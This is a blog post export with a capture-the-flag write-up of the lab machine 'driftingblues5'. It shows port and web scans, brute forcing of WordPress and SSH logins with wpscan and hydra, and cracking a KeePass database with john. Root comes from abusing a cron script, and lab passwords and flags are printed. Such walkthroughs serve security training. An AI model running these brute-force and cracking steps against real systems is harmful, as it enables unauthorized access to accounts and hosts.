{"id":528,"date":"2024-04-11T15:56:17","date_gmt":"2024-04-11T07:56:17","guid":{"rendered":"http:\/\/162.14.82.114\/?p=528"},"modified":"2024-04-11T15:56:17","modified_gmt":"2024-04-11T07:56:17","slug":"hmv-_-driftingblues5","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/528\/04\/11\/2024\/","title":{"rendered":"hmv[-_-]driftingblues5"},"content":{"rendered":"<h1>driftingblues5<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555940.png\" alt=\"image-20240411143032778\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV 172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)\n|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)\n|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.38 ((Debian))\n|_http-generator: WordPress 5.6.2\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: diary &amp;#8211; Just another WordPress site\nService Info: OS: Linux; CPE: 
cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">sudo dirsearch -u http:\/\/172.20.10.4 -e* -i 200,300-399 2&gt;\/dev\/null <\/code><\/pre>\n<pre><code class=\"language-text\">  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/reports\/http_172.20.10.4\/_24-04-11_02-32-03.txt\n\nTarget: http:\/\/172.20.10.4\/\n[02:32:03] Starting: \n[02:32:22] 301 -    0B  - \/index.php  -&gt;  http:\/\/172.20.10.4\/\n[02:32:23] 200 -    7KB - \/license.txt\n[02:32:32] 200 -    3KB - \/readme.html\n[02:32:45] 301 -  313B  - \/wp-admin  -&gt;  http:\/\/172.20.10.4\/wp-admin\/\n[02:32:45] 200 -  512B  - \/wp-admin\/install.php\n[02:32:45] 302 -    0B  - \/wp-admin\/  -&gt;  http:\/\/172.20.10.4\/wp-login.php?redirect_to=http%3A%2F%2F172.20.10.4%2Fwp-admin%2F&amp;reauth=1\n[02:32:45] 200 -    0B  - \/wp-config.php\n[02:32:45] 301 -  315B  - \/wp-content  -&gt;  http:\/\/172.20.10.4\/wp-content\/\n[02:32:45] 200 -    0B  - \/wp-content\/\n[02:32:45] 200 -   84B  - \/wp-content\/plugins\/akismet\/akismet.php\n[02:32:45] 200 -  472B  - \/wp-content\/uploads\/\n[02:32:45] 301 -  316B  - \/wp-includes  -&gt;  http:\/\/172.20.10.4\/wp-includes\/\n[02:32:45] 200 -    0B  - \/wp-cron.php\n[02:32:45] 200 -    0B  - \/wp-includes\/rss-functions.php\n[02:32:45] 200 -    2KB - \/wp-login.php\n[02:32:45] 200 -    4KB - \/wp-includes\/\n[02:32:45] 302 -    0B  - \/wp-signup.php  -&gt;  http:\/\/172.20.10.4\/wp-login.php?action=register\n\nTask Completed<\/code><\/pre>\n<h3>Vulnerability Scan<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.4\n+ Target Hostname:    
172.20.10.4\n+ Target Port:        80\n+ Start Time:         2024-04-11 02:32:30 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.38 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: Drupal Link header found with value: &lt;http:\/\/172.20.10.4\/index.php\/wp-json\/&gt;; rel=&quot;https:\/\/api.w.org\/&quot;. See: https:\/\/www.drupal.org\/\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/index.php?: Uncommon header &#039;x-redirect-by&#039; found, with contents: WordPress.\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Apache\/2.4.38 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/wp-content\/plugins\/akismet\/readme.txt: The WordPress Akismet plugin &#039;Tested up to&#039; version usually matches the WordPress version.\n+ \/wp-links-opml.php: This WordPress script reveals the installed version.\n+ \/license.txt: License file found may identify site software.\n+ \/: A WordPress installation was found.\n+ \/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/wp-content\/uploads\/: Directory indexing found.\n+ \/wp-content\/uploads\/: WordPress uploads directory is browsable. 
This may reveal sensitive information.\n+ \/wp-login.php: WordPress login found.\n+ 8102 requests: 0 error(s) and 15 item(s) reported on remote host\n+ End Time:           2024-04-11 02:32:53 (GMT-4) (23 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h3>wpscan<\/h3>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/172.20.10.4\/ -e u --api-token=xxxx<\/code><\/pre>\n<pre><code class=\"language-css\">[i] User(s) Identified:\n\n[+] abuzerkomurcu\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n |  Rss Generator (Passive Detection)\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/172.20.10.4\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n[+] gill\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] collins\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] satanic\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] gadd\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)<\/code><\/pre>\n<p>I will hold off on using a vulnerability for now: the machine is fairly old, and I do not know whether the author intends for us to exploit one.<\/p>\n<h2>Exploitation<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555942.png\" alt=\"image-20240411143556863\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555943.png\" alt=\"image-20240411143723207\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555944.png\" alt=\"image-20240411143735848\" style=\"zoom:50%;\" \/><\/p>\n<p>This SPIP version is a vulnerable one...<\/p>\n<h3>Checking Sensitive Directories<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.4\/readme.html<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555945.png\" alt=\"image-20240411143853333\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">http:\/\/172.20.10.4\/wp-admin<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555946.png\" alt=\"image-20240411143925060\" style=\"zoom:50%;\" \/><\/p>\n<h3>Brute Force<\/h3>\n<p>Try brute-forcing these users with rockyou and a wordlist generated by crawling the site:<\/p>\n<pre><code class=\"language-bash\">echo &#039;abuzerkomurcu\\ngill\\ncollins\\nsatanic\\ngadd&#039; &gt; user.txt<\/code><\/pre>\n<pre><code class=\"language-bash\">cewl http:\/\/172.20.10.4\/ -d 2 -m 6 -w pass.txt --with-numbers\n# -d 2 recurse two levels deep\n# -m 6 minimum word length\n# --with-numbers words may contain digits <\/code><\/pre>\n<p><code>cewl<\/code> is well suited to non-Chinese practice targets and gives good results; then run the brute force:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ wpscan --url http:\/\/172.20.10.4 -U user.txt -P pass.txt\n\n[+] Performing password attack on Wp Login against 5 user\/s\n[SUCCESS] - gill \/ interchangeable\nTrying gadd \/ Author Time: 00:00:45 &lt;===============================================================               &gt; (4522 \/ 5460) 82.82%  ETA: ??:??:??<\/code><\/pre>\n<p>I also tried brute-forcing SSH, but got nothing, and it probably will not turn anything up:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/172.20.10.4     \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service 
organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 02:47:56\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 4690 login tries (l:5\/p:938), ~294 tries per task\n[DATA] attacking ssh:\/\/172.20.10.4:22\/\n[STATUS] 124.00 tries\/min, 124 tries in 00:01h, 4567 to do in 00:37h, 15 active\n[STATUS] 105.33 tries\/min, 316 tries in 00:03h, 4375 to do in 00:42h, 15 active\n^CThe session file .\/hydra.restore was written. Type &quot;hydra -R&quot; to resume session.<\/code><\/pre>\n<p>Log in and take a look:<\/p>\n<pre><code class=\"language-apl\">gill\ninterchangeable<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555947.png\" alt=\"image-20240411145313615\" style=\"zoom:50%;\" \/><\/p>\n<p>We looked through a few of his blog posts but found nothing of note..<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555948.png\" alt=\"image-20240411145722307\" style=\"zoom:50%;\" \/><\/p>\n<p>Found an odd image whose logo shows the database wording for this challenge; try downloading it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555949.png\" alt=\"image-20240411145810033\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555950.png\" alt=\"image-20240411145945914\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ exiftool dblogo.png \nExifTool Version Number         : 12.76\nFile Name                       : dblogo.png\nDirectory                       : .\nFile Size                       : 19 kB\nFile Modification Date\/Time     : 2021:02:24 09:46:01-05:00\nFile Access Date\/Time           : 2024:04:11 02:58:59-04:00\nFile Inode Change Date\/Time     : 2024:04:11 02:58:20-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PNG\nFile Type Extension             : png\nMIME Type                       : image\/png\nImage Width                     : 300\nImage Height                    : 300\nBit Depth                       : 8\nColor Type                      : RGB with Alpha\nCompression                     : Deflate\/Inflate\nFilter                          : Adaptive\nInterlace                       : Noninterlaced\nSRGB Rendering                  : Perceptual\nGamma                           : 2.2\nPixels Per Unit X               : 2835\nPixels Per Unit Y               : 2835\nPixel Units                     : meters\nXMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017\/07\/13-01:06:39\nCreator Tool                    : Adobe Photoshop CC 2018 (Windows)\nCreate Date                     : 2021:02:24 02:55:28+03:00\nMetadata Date                   : 2021:02:24 02:55:28+03:00\nModify Date                     : 2021:02:24 02:55:28+03:00\nInstance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405\nDocument ID                     : 
adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b\nOriginal Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c\nColor Mode                      : RGB\nICC Profile Name                : sRGB IEC61966-2.1\nFormat                          : image\/png\nHistory Action                  : created, saved\nHistory Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405\nHistory When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00\nHistory Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)\nHistory Changed                 : \/\nText Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not\nText Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)\nDocument Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b\nImage Size                      : 300x300\nMegapixels                      : 0.090<\/code><\/pre>\n<p>The metadata says the <code>ssh<\/code> password is <code>59583hello<\/code>; try it against the user list:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ hydra -L user.txt -p 59583hello  ssh:\/\/172.20.10.4\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 03:01:35\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[WARNING] Restorefile (you have 10 seconds to abort... 
(use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:5\/p:1), ~1 try per task\n[DATA] attacking ssh:\/\/172.20.10.4:22\/\n[22][ssh] host: 172.20.10.4   login: gill   password: 59583hello\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-11 03:01:48<\/code><\/pre>\n<pre><code class=\"language-apl\">gill\n59583hello<\/code><\/pre>\n<p>Log in over ssh:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555951.png\" alt=\"image-20240411150327686\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/home\/gill$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n(remote) gill@driftingblues:\/home\/gill$ sudo -l\n-bash: sudo: command not found\n(remote) gill@driftingblues:\/home\/gill$ ls -la\ntotal 24\ndrwxr-xr-x 4 gill gill 4096 Apr 11 02:01 
.\ndrwxr-xr-x 3 root root 4096 Feb 24  2021 ..\ndrwx------ 3 gill gill 4096 Apr 11 02:01 .gnupg\n-rwx------ 1 gill gill 2030 Feb 24  2021 keyfile.kdbx\ndrwx------ 2 gill gill 4096 Feb 24  2021 .ssh\n-r-x------ 1 gill gill   32 Feb 24  2021 user.txt\n(remote) gill@driftingblues:\/home\/gill$ cat user.txt \nF83FC7429857283616AE62F8B64143E6(remote) gill@driftingblues:\/home\/gill$ file keyfile.kdbx \nkeyfile.kdbx: Keepass password database 2.x KDBX<\/code><\/pre>\n<blockquote>\n<p><strong>Keepass Password Database 2.x KDBX<\/strong> is the database file format used by version 2.x of the KeePass password manager. KeePass is a password manager that runs on multiple operating systems (such as Windows, Mac and Linux) and on mobile devices. It stores passwords in a strongly encrypted database, and those passwords are locked by a master key file. Even though older versions of KeePass use KDB files, they can still be used to open KDBX files. In short, a KDBX file is the password database file of KeePass 2.x, used to store and manage a user's password information securely.<\/p>\n<p>Reference: <a href=\"https:\/\/blog.csdn.net\/u012206617\/article\/details\/130964836\">https:\/\/blog.csdn.net\/u012206617\/article\/details\/130964836<\/a><\/p>\n<\/blockquote>\n<p>Try cracking it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ keepass2john keyfile.kdbx &gt; hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ john hash 
-w=\/usr\/share\/wordlists\/rockyou.txt        \nUsing default input encoding: UTF-8\nLoaded 1 password hash (KeePass [SHA256 AES 32\/64])\nCost 1 (iteration count) is 60000 for all loaded hashes\nCost 2 (version) is 2 for all loaded hashes\nCost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nporsiempre       (keyfile)     \n1g 0:00:00:53 DONE (2024-04-11 03:18) 0.01869g\/s 128.7p\/s 128.7c\/s 128.7C\/s winston1..palomita\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\n<p>Then install <code>keepass2<\/code>:<\/p>\n<pre><code class=\"language-bash\">sudo apt install keepass2<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555952.png\" alt=\"image-20240411152246237\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-apl\">zakkwylde\nbuddyretard\n2read4surreal\ncloset313\nfracturedocean\nexalted<\/code><\/pre>\n<p>Tried switching to root with these passwords, but none of them worked.<\/p>\n<h3>Uploading linpeas.sh and pspy64<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555953.png\" alt=\"image-20240411152712458\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555954.png\" alt=\"image-20240411152852997\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555955.png\" alt=\"image-20240411153313123\" style=\"zoom:50%;\" \/><\/p>\n<p>What? There is nothing to go on here.<\/p>\n<h3>Information Gathering<\/h3>\n<p>Let us keep looking:<\/p>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/tmp$ cd \/\n(remote) gill@driftingblues:\/$ ls -la\ntotal 69\ndrwxr-xr-x 19 root root  4096 Feb 24  2021 .\ndrwxr-xr-x 19 root root  4096 Feb 24  2021 ..\nlrwxrwxrwx  1 root root     7 Dec 17  2020 bin -&gt; usr\/bin\ndrwxr-xr-x  3 root root  4096 Dec 17  2020 boot\ndrwxr-xr-x 17 root root  3260 Apr 11 01:28 dev\ndrwxr-xr-x 73 root root  4096 Apr 11 01:28 etc\ndrwxr-xr-x  3 root root  4096 Feb 24  2021 home\nlrwxrwxrwx  1 root root    31 Dec 17  2020 initrd.img -&gt; boot\/initrd.img-4.19.0-13-amd64\nlrwxrwxrwx  1 root root    31 Dec 17  2020 initrd.img.old -&gt; boot\/initrd.img-4.19.0-13-amd64\ndrwx---rwx  2 root root  4096 Feb 24  2021 keyfolder\nlrwxrwxrwx  1 root root     7 Dec 17  2020 lib -&gt; usr\/lib\nlrwxrwxrwx  1 root root     9 Dec 17  2020 lib32 -&gt; usr\/lib32\nlrwxrwxrwx  1 root root     9 Dec 17  2020 lib64 -&gt; usr\/lib64\nlrwxrwxrwx  1 root root    10 Dec 17  2020 libx32 -&gt; usr\/libx32\ndrwx------  2 root root 16384 Dec 17  2020 lost+found\ndrwxr-xr-x  3 root root  4096 Dec 17  2020 media\ndrwxr-xr-x  2 root root  4096 Dec 17  2020 mnt\ndrwxr-xr-x  2 root root  4096 Dec 17  2020 opt\ndr-xr-xr-x 94 root root     0 Apr 11 01:28 proc\ndrwx------  2 root root  4096 Feb 24  2021 root\ndrwxr-xr-x 18 root root   540 Apr 11 02:03 run\nlrwxrwxrwx  1 root root     8 Dec 17  2020 sbin -&gt; usr\/sbin\ndrwxr-xr-x  2 root root  4096 Dec 17  2020 srv\ndr-xr-xr-x 13 root root     0 Apr 11 01:28 sys\ndrwxrwxrwt  9 root root  1024 Apr 11 02:26 tmp\ndrwxr-xr-x 13 root root  4096 Dec 17  2020 
usr\ndrwxr-xr-x 13 root root  4096 Dec 17  2020 var\nlrwxrwxrwx  1 root root    28 Dec 17  2020 vmlinuz -&gt; boot\/vmlinuz-4.19.0-13-amd64\nlrwxrwxrwx  1 root root    28 Dec 17  2020 vmlinuz.old -&gt; boot\/vmlinuz-4.19.0-13-amd64\n(remote) gill@driftingblues:\/$ cd \/opt;ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 .\ndrwxr-xr-x 19 root root 4096 Feb 24  2021 ..\n(remote) gill@driftingblues:\/opt$ cd \/keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ ls -la\ntotal 8\ndrwx---rwx  2 root root 4096 Feb 24  2021 .\ndrwxr-xr-x 19 root root 4096 Feb 24  2021 ..\n(remote) gill@driftingblues:\/keyfolder$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) gill@driftingblues:\/keyfolder$ cd \/usr\/local\n(remote) gill@driftingblues:\/usr\/local$ ls -la\ntotal 40\ndrwxr-xr-x 10 root root 4096 Dec 17  2020 .\ndrwxr-xr-x 13 root root 4096 Dec 17  2020 ..\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 bin\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 etc\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 games\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 include\ndrwxr-xr-x  4 root root 4096 Dec 17  2020 lib\nlrwxrwxrwx  1 root root    9 Dec 17  2020 man -&gt; share\/man\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 sbin\ndrwxr-xr-x  4 root root 4096 Dec 17  2020 share\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 src\n(remote) gill@driftingblues:\/usr\/local$ mail\n-bash: mail: command not found\n(remote) gill@driftingblues:\/usr\/local$ cd share\n(remote) gill@driftingblues:\/usr\/local\/share$ ls\nca-certificates  man\n(remote) gill@driftingblues:\/usr\/local\/share$ cd 
\/<\/code><\/pre>\n<p>I didn't know what to look for, so I checked a writeup and found that the logic is probably to check whether a key exists in <code>keyfolder<\/code>; if it does, the password gets dropped in there.<\/p>\n<p>We have to try them one by one; only one of the passwords is the one we want. Let's try creating all of them:<\/p>\n<pre><code>buddyretard\n2read4surreal\ncloset313\nfracturedocean\nexalted<\/code><\/pre>\n<p>I have already tried <code>zakkwylde<\/code> and it did not work; putting them all in at once does not work either:<\/p>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/$ cd keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ touch zakkwylde\n(remote) gill@driftingblues:\/keyfolder$ cd \/tmp\n(remote) gill@driftingblues:\/tmp$ .\/pspy64 \n........\n2024\/04\/11 02:45:37 CMD: UID=0    PID=1      | \/sbin\/init \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13906  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13907  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13908  | \/bin\/sh -c \/root\/key.sh \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13909  | \/bin\/bash \/root\/key.sh \n2024\/04\/11 02:46:03 CMD: UID=0    PID=13910  | \n^CExiting program... 
(interrupt)\n(remote) gill@driftingblues:\/tmp$ cd \/keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ ls\nzakkwylde\n(remote) gill@driftingblues:\/keyfolder$ rm zakkwylde \n(remote) gill@driftingblues:\/keyfolder$ touch buddyretard\n(remote) gill@driftingblues:\/keyfolder$ touch 2read4surreal\n(remote) gill@driftingblues:\/keyfolder$ touch closet313\n(remote) gill@driftingblues:\/keyfolder$ touch fracturedocean\n(remote) gill@driftingblues:\/keyfolder$ touch exalted\n(remote) gill@driftingblues:\/keyfolder$ cd \/tmp;.\/pspy64\n........\n2024\/04\/11 02:47:49 CMD: UID=0    PID=1      | \/sbin\/init \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13964  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13965  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13966  | \/bin\/sh -c \/root\/key.sh \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13967  | \/bin\/bash \/root\/key.sh \n^CExiting program... (interrupt)\n(remote) gill@driftingblues:\/tmp$ cd \/keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ ls\n2read4surreal  buddyretard  closet313  exalted  fracturedocean<\/code><\/pre>\n<p>So we can only go one at a time:<\/p>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/keyfolder$ ls\n2read4surreal  buddyretard  closet313  exalted  fracturedocean\n(remote) gill@driftingblues:\/keyfolder$ rm 2read4surreal buddyretard closet313 exalted \n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean\n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean\n(remote) gill@driftingblues:\/keyfolder$ rm fracturedocean \n(remote) gill@driftingblues:\/keyfolder$ touch buddyretard\n(remote) gill@driftingblues:\/keyfolder$ ls\nbuddyretard\n(remote) gill@driftingblues:\/keyfolder$ ls\nbuddyretard\n(remote) gill@driftingblues:\/keyfolder$ rm buddyretard \n(remote) gill@driftingblues:\/keyfolder$ touch 2read4surreal\n(remote) gill@driftingblues:\/keyfolder$ ls\n2read4surreal\n(remote) 
gill@driftingblues:\/keyfolder$ ls\n2read4surreal\n(remote) gill@driftingblues:\/keyfolder$ rm 2read4surreal \n(remote) gill@driftingblues:\/keyfolder$ touch closet313\n(remote) gill@driftingblues:\/keyfolder$ ls\ncloset313\n(remote) gill@driftingblues:\/keyfolder$ ls\ncloset313\n(remote) gill@driftingblues:\/keyfolder$ rm closet313 \n(remote) gill@driftingblues:\/keyfolder$ touch fracturedocean\n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean\n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean  rootcreds.txt\n(remote) gill@driftingblues:\/keyfolder$ cat rootcreds.txt \nroot creds\n\nimjustdrifting31\n(remote) gill@driftingblues:\/keyfolder$ su root\nPassword: \nroot@driftingblues:\/keyfolder# cd \/root\nroot@driftingblues:~# ls -la\ntotal 20\ndrwx------  2 root root 4096 Feb 24  2021 .\ndrwxr-xr-x 19 root root 4096 Feb 24  2021 ..\n-rw-------  1 root root   61 Feb 24  2021 .bash_history\n-rwx------  1 root root  205 Feb 24  2021 key.sh\n-r-x------  1 root root   32 Feb 24  2021 root.txt\nroot@driftingblues:~# cat root.txt \n9EFF53317826250071574B4D4EE56840root@driftingblues:~# cat key.sh \n#!\/bin\/bash\n\nif [[ $(ls \/keyfolder) == &quot;fracturedocean&quot; ]]; then\n        echo &quot;root creds&quot; &gt;&gt; \/keyfolder\/rootcreds.txt\n        echo &quot;&quot; &gt;&gt; \/keyfolder\/rootcreds.txt\n        echo &quot;imjustdrifting31&quot; &gt;&gt; \/keyfolder\/rootcreds.txt\nfi\nroot@driftingblues:~# cat .bash_history \ncd \/\nls -la\ncd \/root\/\n.\/logdel2 \nrm logdel2 \nshutdown -h now<\/code><\/pre>\n<p>Got the flag.....<\/p>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues5 Information gathering Port scanning nmap -sCV 172.20.10.4 PORT STA 
